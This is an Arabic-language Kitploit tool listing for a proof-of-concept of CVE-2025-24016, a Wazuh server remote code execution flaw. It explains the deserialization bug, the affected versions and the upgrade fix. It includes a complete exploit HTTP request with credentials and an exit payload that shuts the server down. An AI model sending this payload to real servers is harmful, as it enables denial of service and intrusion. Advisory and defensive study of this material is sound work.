Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24016 — CVE-2025-24016: ثغرة RCE في خادم Wazuh! تنفيذ تعليمات برمجية عن بُعد | Kitploit
أدوات/GitHubGitHub/glostarrx1/cve-2025-24016
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubglostarrx1/cve-2025-24016

CVE-2025-24016

CVE-2025-24016: ثغرة RCE في خادم Wazuh! تنفيذ تعليمات برمجية عن بُعد

عرض المستودع
162منذ سنة واحدةلم تتم المراجعة بعد
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة تنفيذ الأوامر عن بُعد (RCE) في Wazuh - إثبات المفهوم (PoC)

نظرة عامة على الثغرة

يوضح هذا المستودع ثغرة تنفيذ الأوامر عن بُعد (RCE) في خادم Wazuh، والتي نجمت عن إلغاء تسلسل غير آمن في حزمة wazuh-manager. تتيح الثغرة للمهاجمين عن بُعد ممن لديهم إمكانية الوصول إلى واجهة برمجة التطبيقات (لوحة التحكم المخترقة، خوادم Wazuh في الكتلة، أو تكوينات معينة تحتوي على عوامل مخترقة) تنفيذ تعليمات برمجية عشوائية على الخادم.

الإصدارات المتأثرة

  • wazuh-manager الإصدار >= 4.4.0
  • تم التصحيح في الإصدار >= 4.9.1

الوصف

تحدث الثغرة في واجهة برمجة تطبيقات Wazuh، حيث يتم تسلسل المعاملات في DistributedAPI بتنسيق JSON وإلغاء تسلسلها باستخدام في ملف . يمكن للمهاجم استغلال هذه الثغرة عن طريق حقن قاموس غير منقح في طلبات DAPI، مما قد يؤدي إلى تقييم تعليمات برمجية عشوائية بلغة Python.

as_wazuh_object
framework/wazuh/core/cluster/common.py

يمكن تشغيل الثغرة باستخدام نقطة النهاية run_as، التي تتيح للمهاجم التحكم في وسيطة auth_context. من خلال صياغة طلب ضار، يمكن تنفيذ تعليمات برمجية عشوائية على الخادم الرئيسي.

إثبات المفهوم

لتشغيل هذه الثغرة باستخدام واجهة برمجة تطبيقات الخادم، اتبع الخطوات التالية.

طلب Burp Suite لإثبات المفهوم

  1. طلب Burp Suite لتشغيل الثغرة:
root@kitploit:~
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==  # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83

{
  "__unhandled_exc__": {
    "__class__": "exit",
    "__args__": []
  }
}

صورة الحل

  1. شرح الطلب:
  • رأس Authorization: هذا هو رمز التفويض المشفر بـ Base64 (wazuh-wui:MyS3cr37P450r.*-).
  • الحمولة: تحتوي الحمولة الضارة على الاستثناء غير المنقح __unhandled_exc__ الذي يشغل تنفيذ تعليمات برمجية عشوائية بلغة Python (في هذه الحالة exit).

الأثر

  • تنفيذ الأوامر عن بُعد (RCE): تتيح هذه الثغرة للمهاجمين تنفيذ تعليمات برمجية عشوائية على خادم Wazuh، مما يؤثر على الإصدارات >= 4.4.0 حتى 4.9.0 (غير مصححة بعد).
  • رفض الخدمة المحتمل: في إثبات المفهوم هذا، يتم تشغيل الدالة exit مما يتسبب في إيقاف تشغيل خادم Wazuh.

التخفيف

لحماية أنظمتك، قم بالترقية إلى إصدار Wazuh >= 4.9.1 حيث تم تصحيح هذه المشكلة.

تنزيل الأداة